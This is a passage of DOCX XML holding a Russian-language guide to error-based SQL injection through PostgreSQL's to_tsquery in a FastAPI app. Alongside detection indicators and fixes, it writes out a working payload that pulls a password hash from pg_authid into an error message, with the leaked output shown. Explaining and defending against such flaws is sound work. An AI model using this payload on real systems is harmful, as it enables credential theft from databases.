          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через regconfig-cast в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Альтернативно, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> концатенируется (а не bind):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query = text(f"... to_tsquery('english', '{q}') ...")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /search?q=hello%27%20||%20(SELECT%20rolpassword%20FROM%20pg_authid%20LIMIT%201)%20||%20%27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q = "hello' || (SELECT rolpassword FROM pg_authid LIMIT 1) || '"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery('english', 'hello' || (SELECT rolpassword FROM pg_authid LIMIT 1) || '')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Concat выполняется, итог — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'helloSCRAM-SHA-256$...'</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парсит это как один token (содержит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что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не валидные tsquery-chars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: syntax error in tsquery: "helloSCRAM-SHA-256$4096:abc..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Password leaked в error message.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Extraction любого SELECT-доступного значения в response error message. Эффективнее boolean-blind (3.3) — один запрос → один полный value, не побитная extraction. Эффективнее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-time-based — нет necesidad waiting. Опасность: artefact выглядит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обычная application error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, без необычных SQL-конструкций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(subquery вычислился до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error не содержит full query plan).</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query с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery(' || (SELECT ...) || ', ...)</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to_tsquery(..., ' || (SELECT ...) || ')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нетипичные concat-patterns в literal-position.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log_min_messages = error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syntax error in tsquery: "..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с длинными strings (&gt;50 chars) — индикатор leakage.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log_min_messages = error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 search configuration "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с подозрительным config-name — Variant B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HTTP access-log: query parameter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config=</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escape characters.</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Три независимых факта:</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`to_tsquery` evaluates input при parsing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PostgreSQL evaluates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'a' || (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вызова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потому что это standard SQL expression-evaluation. Subquery result становится частью string-literal.</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`to_tsquery` syntax errors включают input verbatim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Источник в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/adt/tsquery.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: при parser error функция вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ereport(ERROR, (errcode, errmsg("syntax error in tsquery: \"%s\"", input)))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — input копируется в errmsg как есть.</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Application error handler пересылает Postgres error в HTTP response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. FastAPI default — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP 500</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detail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = repr(exception). SQLAlchemy DBAPIError содержит исходный текст error message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание этих трёх — error-based extraction-канал через любую concat-injection в текст, который попадает в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Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">никакой concat в аргументах `to_tsquery`</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Безопасный шаблон: всё через bind, config — Literal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from typing import Literal</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@router.get("/search")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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", max_length=200),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: Literal["english", "russian", "german"] = Query("english"),</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config через bind как regconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id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websearch_to_tsquery(:config::regconfig, :q)</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await session.execute(query, {"config": config, "q": q})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Literal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> гарантирует whitelist на уровне FastAPI; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">:config::regconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cast делает PG-side validation (если bind value не существует как regconfig — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: text search configuration ... does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без leaked subquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что bind value никогда не evaluating-ся как expression).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устраняет syntax-error канал даже для invalid q.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительная защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">error-handler middleware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не пересылает SQL-error в HTTP response</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Глобальный handler — не leak Postgres error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.exception_handler(SQLAlchemyError)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def sqlalchemy_error_handler(request, exc):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    logger.exception("Database error", exc_info=exc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return JSONResponse(status_code=500, content={"detail": "Internal server error"})</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defence-in-depth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — даже если pattern injection попадёт через, error message не leaked клиенту.</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с tsquery (8.3+).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EXECUTE-доступ к эндпоинту + SELECT на target-tables (для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Драйвер:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> любой.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user-controlled input через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">concatenation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в первом или втором аргументе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Bind-параметр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сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не уязвим</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нужна именно concat-injection.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app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: error message Postgres попадает в HTTP response body (DEBUG mode, default FastAPI exception handler, Spring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">include-message=always</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с server-side built first argument (из validated config + validated tokens) — корректное использование. Concat для построения tsquery-string на стороне application допустимо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> если все компоненты — validated tokens или whitelist values:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
